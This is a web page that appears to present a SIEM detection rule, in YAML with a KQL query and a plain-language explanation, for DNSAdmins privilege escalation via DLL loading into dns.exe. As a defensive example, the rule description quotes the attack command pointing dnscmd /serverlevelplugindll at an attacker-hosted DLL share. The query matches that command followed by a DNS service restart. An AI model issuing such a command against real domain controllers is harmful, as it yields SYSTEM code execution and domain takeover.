Query Details
16 DNS DNS Admin DLL Injection
Query
id: a1b2c3d4-0016-4a5b-8c9d-dns016dnsadmin
name: DNSAdmins Privilege Escalation via DLL Injection (dnscmd /serverlevelplugindll)
description: |
Detects the DNSAdmins Active Directory privilege escalation technique where
a member of the DNSAdmins group registers a malicious DLL to be loaded into
dns.exe (which runs as SYSTEM) using:
dnscmd.exe /config /serverlevelplugindll \\attacker\share\evil.dll
The attack requires a subsequent DNS service restart to load the DLL, at
which point the payload executes as NT AUTHORITY\SYSTEM on the DNS server
(typically a Domain Controller).
This technique was publicly documented by Shay Ber in 2017 and has been
used in real-world attacks. Any account in DNSAdmins — even a low-privilege
domain account — can execute this technique without Domain Admin rights.
Key signals detected by this rule:
1. dnscmd.exe executed with /serverlevelplugindll in the command line
2. DNS service stop/restart within 60 minutes on the same host
Both conditions must match on the same Computer within the time window.
MITRE T1574.002 (Hijack Execution Flow: DLL Side-Loading via DNS service)
MITRE T1078.002 (Domain Accounts — DNSAdmins group membership)
Ref: Shay Ber "Abusing DNSAdmins privilege for escalation in Active Directory"
severity: High
requiredDataConnectors:
- connectorId: SecurityEvents
dataTypes:
- SecurityEvent
queryFrequency: 1h
queryPeriod: 1h
triggerOperator: gt
triggerThreshold: 0
status: Available
tactics:
- PrivilegeEscalation
- Persistence
relevantTechniques:
- T1574.002
- T1078.002
tags:
- DNSAdmins
- DLL Injection
- Privilege Escalation
- SYSTEM
- Active Directory
- dns.exe
query: |
// Step 1: Detect dnscmd.exe invoked with /serverlevelplugindll
// (registers arbitrary DLL to be loaded by dns.exe at SYSTEM privilege)
let DnscmdAbuse =
SecurityEvent
| where TimeGenerated > ago(1h)
| where EventID == 4688 // Process Creation (requires audit policy)
| where NewProcessName has "dnscmd.exe"
| where CommandLine has "serverlevelplugindll"
| project
DnscmdTime = TimeGenerated,
Computer,
SubjectAccount = SubjectUserName,
CommandLine;
// Step 2: Detect DNS service restart following the dnscmd call
// Restart is required to load the DLL — without it the attack is incomplete
let DnsServiceRestart =
SecurityEvent
| where TimeGenerated > ago(1h)
| where EventID == 7036 or EventID == 4697
| where Activity has "DNS" or ServiceName contains "DNS"
| project
RestartTime = TimeGenerated,
Computer,
ServiceEvent = Activity;
// Correlate: same Computer, restart within 60 min of dnscmd
DnscmdAbuse
| join kind=inner DnsServiceRestart on Computer
| where abs(datetime_diff("minute", DnscmdTime, RestartTime)) < 60
| project
DnscmdTime,
Computer,
SubjectAccount,
CommandLine,
RestartTime,
ServiceEvent
entityMappings:
- entityType: Host
fieldMappings:
- identifier: FullName
columnName: Computer
- entityType: Account
fieldMappings:
- identifier: Name
columnName: SubjectAccount
customDetails:
CommandLine: CommandLine
ServiceEvent: ServiceEvent
alertDetailsOverride:
alertDisplayNameFormat: "DNSAdmins DLL Injection — {{SubjectAccount}} on {{Computer}} registered malicious DLL"
alertDescriptionFormat: "User {{SubjectAccount}} on {{Computer}} executed dnscmd /serverlevelplugindll (command: '{{CommandLine}}'). DNS service restart detected within 60 minutes — malicious DLL may have been loaded by dns.exe at SYSTEM privilege level."
Explanation
This query is designed to detect a specific security threat in an Active Directory environment, where someone with DNSAdmins privileges attempts to escalate their privileges using a technique called DLL Injection. Here's a simplified breakdown:
-
What It Detects: The query looks for a method where a member of the DNSAdmins group registers a malicious DLL file to be loaded by the DNS server process (dns.exe), which runs with high-level SYSTEM privileges. This is done using the command
dnscmd.exe /config /serverlevelplugindll. -
How It Works:
- Step 1: It first checks for the execution of
dnscmd.exewith the specific command line argument/serverlevelplugindll, which indicates an attempt to register a DLL. - Step 2: It then looks for a DNS service restart on the same computer within 60 minutes of the
dnscmd.exeexecution. The restart is necessary for the malicious DLL to be loaded and executed.
- Step 1: It first checks for the execution of
-
Why It's Important: This technique allows an attacker to execute code with SYSTEM privileges on a DNS server, which is often a Domain Controller, without needing Domain Admin rights. It was publicly documented in 2017 and has been used in real-world attacks.
-
Severity and Response: The severity is marked as High, indicating a significant security risk. The query runs every hour and triggers an alert if any suspicious activity is detected.
-
Technical Details:
- It uses Security Events data to identify process creation and service restart events.
- It correlates these events to ensure they occur on the same computer within a specified time frame.
-
Output: If the conditions are met, the query generates an alert with details about the user account involved, the computer affected, and the command line used, suggesting that a malicious DLL might have been loaded.
Overall, this query helps security teams identify and respond to potential privilege escalation attempts in their network.
Details
David Alonso
Released: March 26, 2026
Tables
Keywords
Operators